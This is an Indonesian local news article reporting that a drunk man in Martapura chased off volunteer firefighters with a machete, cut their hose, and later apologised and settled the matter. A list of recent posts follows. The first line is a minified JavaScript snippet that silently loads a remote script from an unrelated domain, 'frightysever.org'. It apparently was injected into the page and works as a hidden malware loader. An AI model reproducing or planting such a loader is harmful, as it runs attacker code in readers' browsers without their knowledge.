(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Berujung Minta Maaf, Lelaki Ini Ungkap Alasan Usir BPK saat Padamkan Api di Kampung Melayu Martapura


KANALKALIMANTAN.COM, MARTAPURA – Seorang lelaki yang viral akibat menghalang-halangi Barisan Pemadam Kebakaran (BPK) memadamkam api digiring ke Mapolsek Martapura Timur, Jumat (2/6/2023) siang.

Kejadian bermula saat kobaran api mulai membakar sebuah rumah yang berada di tengah persawahan sekitar pukul 07.00 Wita.

Namun, saat barisan pemadam kebakaran berdatangan untuk memadamkan api, seorang lelaki tiba-tiba datang dengan membawa senjata tajam jenis parang.

Tanpa mengenakan baju alias telanjang dada, dia pun menghalau relawan BPK dengan acungan parang mengusir dari kobaran api yang sedang menyala hebat.

Baca juga: Kebakaran di Kampung Melayu Martapura: Lelaki Berparang Usir BPK, Selang Air Ditebas

Tak cukup sampai di situ, lelaki ini menebas selang milik BPK Pekauman Ulu (Palu) hingga terpotong. Alhasil dengan bantuan kepolisian, lelaki itu berhasil digiring ke Mapolsek Martapura Timur.

Di Mapolsek Martapura Timur, Syamsuri, warga RT 6 Kampung Melayu, Kecamatan Martapura Timur, Kabupaten Banjar meminta maaf atas perbuatannya.

“Ulun Syamsuri warga RT 6, dengan ini ulun minta maaf kepada kekawanan BPK semuaan, terutama BPK Paakauman Ulu,” ucap Syamsuri, dalam video rekaman permintaan maaf.

Syamsuri mengatakan saat kejadian, dirinya tengah berada dalam pengaruh minuman beralkohol. Sehingga dia pun tak sadarkan diri saat melakukan hal yang berbahaya itu.

Baca juga: Soroti Longsor Jalan Nasional Km 171, Mana Suara Anggota DPR dan DPD RI Asal Kalsel!

“Karena pikiran ulun yang tidak stabil saat kejadian akibat miras dan ulun berjanji tidak mengulangi perbuatan itu,” imbuhnya.

Dirinya juga mengatakan akan mengganti kerugian yang dialami armada BPK Palu atas ulahnya tersebut.

Setelah bertemu Syamsuri, H Muhammad Luthfi, Ketua BPK Palu bersama dengan Pembakal Desa Kampung Melayu Asnan sepakat melakukan perdamaian.

“Setelah video di media sosial karena menghalagi BPK memadamkan api oleh warga dengan parang yang kemudian dipotongnya selang BPK, dengan ini menyatakan permasalahan tersebut sudah selesai dengan bantuan semua pihak, terutama pihak Polsek Martapura Timur,” ungkap H Muhammad Luthfi, Ketua BPK Palu.

Baca juga: Diduga Sakit, Lelaki Tunawisma di Banjarbaru Ditemukan Meninggal Dunia

Meski begitu, H Muhammad Luthfi yang memberikan keterangan terpisah mengaku menyayangkan kejadian ini dan berharap tidak ada lagi kejadian serupa.

“Semoga kejadian ini tidak terulang kembali dan menjadi pembelajaran buat kita semua bahwa tugas BPK hanya untuk membantu masyarakat sesuai dengan slogan, Pantang Pulang Sebelum Padam,” tutupnya. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Risa

Recent Posts

Ribuan Orang Hadiri Haul Ke-13 Abah Anang Djazouly

KANALKALIMANTAN.COM,MARTAPURA -  Ribuan orang dari berbagai tempat memadati kawasan kubah KH M Djazouly Fadil Seman… Read More

2 jam ago

Analis Minta Pemerintah Terbuka dan Jujur soal Tapera Potong Gaji Pekerja

KANALKALIMANTAN.COM, JAKARTA - Direktur Eksekutif Prakarsa, Ah Maftuchan, mengatakan pemerintah seharusnya bisa lebih terbuka dan… Read More

24 jam ago

Peringati Hari Lahir Pancasila, Ini Pesan Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semarak warna dan semangat cinta Tanah Air dalam peringatan Hari Lahir Pancasila… Read More

24 jam ago

Parade Hari Lahir Pancasila di Depan Balai Kota Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Ratusan pelajar, anggota TNI, Polri, dan pegawai di lingkungan Pemerintah Kota (Pemko)… Read More

1 hari ago

27 Anggota Purna Paskibraka 2023 Dikukuhkan

KANALKALIMANTAN.COM, MARTAPURA - Mewakili bupati Banjar, Kepala Badan Kesatuan Bangsa dan Politik (Kesbangpol) Kabupaten Banjar… Read More

1 hari ago

Satgas TMMD Penyuluhan ke Pelajar SMKN 2 Amuntai

KANALKALIMANTAN.COM, AMUNTAI - Satuan Tugas (Satgas) TNI Manunggal Membangun Desa (Satgas TMMD) ke-120 Kodim 1001/HSU-Balangan… Read More

1 hari ago

This website uses cookies.